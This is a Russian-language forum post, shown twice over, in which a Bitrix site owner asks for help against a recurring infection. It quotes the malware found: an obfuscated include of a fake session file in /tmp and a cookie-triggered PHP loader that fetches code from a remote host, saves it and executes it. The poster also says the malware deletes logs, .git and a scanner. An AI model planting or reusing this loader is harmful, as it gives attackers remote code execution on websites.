Добрый день!
Злоумышленник через бекдоры создает в папке /tmp/ два файла, маскриующихся под сессию:
ssess_567837756254359e7a03632732444a28
ssess_b7bfe150975c63efd97316482c6e36d1.php
В prolog_after.php вставляет:
@ include_once ('/tmp/sses'.'s_b7'.'b'.'fe'.'150975c63'.'efd97'.'31'.'6'.'482c6e3'.'6'.'d1');
if(class_exists('BS')){$b = new BS();echo $b->exec();}
В bx_root.php:
function bsget($g, $p=0)
{
$g = parse_url($g);
$d = '';
$h = ($p?'POST':'GET')." ".$g['path'];
if(isset($g['query'])) $h .= '?'.$g['query'];
$h .= " HTTP/1.0\r\n";
$h .= "Host: ".$g['host']."\r\n";
if($p)
{
$h .= "Content-Type: application/x-www-form-urlencoded\r\n";
$h .= "Content-Length: ".strlen($p)."\r\n\r\n".$p."\r\n\r\n";
}else $h .= "Connection: Close\r\n\r\n";
$fp = fsockopen($g['host'], 80);
//var_dump($fp);exit;
if($fp) {
@fputs($fp, $h);
$r = 0;
while(!feof($fp))
{
$b = fgets($fp, 1024);
if($r) $d .= $b;
if($b == "\r\n") $r = 1;
}
@fclose($fp);
return $d;
}
return FALSE;
}
if(isset($_COOKIE['__bs_rh']) && isset($_COOKIE['h']))
{
$c = bsget('http://'.$_COOKIE['__bs_rh'].'/?__bs='.$_COOKIE['h']);
$f = @ini_get('upload_tmp_dir');
$f = isset($_POST['__bstmp'])?$_POST['__bstmp']:(empty($f) ? '/tmp' : $f).'/php5';
$fp = fopen($f, 'w');
fwrite($fp, $c);
fclose($fp);
$__bs = array('bsfile'=>$f);
include($f);
exit;
}
Результатов являются появление вредоносных ссылок сразу после хедера.
Также удаляет папки logs, .git и aibolit.php. Создает дополнительные бекдоры.
Если удаляешь вирус, он появляется вновь и вновь и вновь.
Вроде есть целая сеть таких зараженных на Битриксе сайтов. Но при этом ничего не ищется по данной теме.
Знакома ли кому-то данная проблема? Удалось ли побороть злоумышленника?
Буду рад любой информации по описанной ситуации!
Злоумышленник через бекдоры создает в папке /tmp/ два файла, маскриующихся под сессию:
ssess_567837756254359e7a03632732444a28
ssess_b7bfe150975c63efd97316482c6e36d1.php
В prolog_after.php вставляет:
@ include_once ('/tmp/sses'.'s_b7'.'b'.'fe'.'150975c63'.'efd97'.'31'.'6'.'482c6e3'.'6'.'d1');
if(class_exists('BS')){$b = new BS();echo $b->exec();}
В bx_root.php:
function bsget($g, $p=0)
{
$g = parse_url($g);
$d = '';
$h = ($p?'POST':'GET')." ".$g['path'];
if(isset($g['query'])) $h .= '?'.$g['query'];
$h .= " HTTP/1.0\r\n";
$h .= "Host: ".$g['host']."\r\n";
if($p)
{
$h .= "Content-Type: application/x-www-form-urlencoded\r\n";
$h .= "Content-Length: ".strlen($p)."\r\n\r\n".$p."\r\n\r\n";
}else $h .= "Connection: Close\r\n\r\n";
$fp = fsockopen($g['host'], 80);
//var_dump($fp);exit;
if($fp) {
@fputs($fp, $h);
$r = 0;
while(!feof($fp))
{
$b = fgets($fp, 1024);
if($r) $d .= $b;
if($b == "\r\n") $r = 1;
}
@fclose($fp);
return $d;
}
return FALSE;
}
if(isset($_COOKIE['__bs_rh']) && isset($_COOKIE['h']))
{
$c = bsget('http://'.$_COOKIE['__bs_rh'].'/?__bs='.$_COOKIE['h']);
$f = @ini_get('upload_tmp_dir');
$f = isset($_POST['__bstmp'])?$_POST['__bstmp']:(empty($f) ? '/tmp' : $f).'/php5';
$fp = fopen($f, 'w');
fwrite($fp, $c);
fclose($fp);
$__bs = array('bsfile'=>$f);
include($f);
exit;
}
Результатов являются появление вредоносных ссылок сразу после хедера.
Также удаляет папки logs, .git и aibolit.php. Создает дополнительные бекдоры.
Если удаляешь вирус, он появляется вновь и вновь и вновь.
Вроде есть целая сеть таких зараженных на Битриксе сайтов. Но при этом ничего не ищется по данной теме.
Знакома ли кому-то данная проблема? Удалось ли побороть злоумышленника?
Буду рад любой информации по описанной ситуации!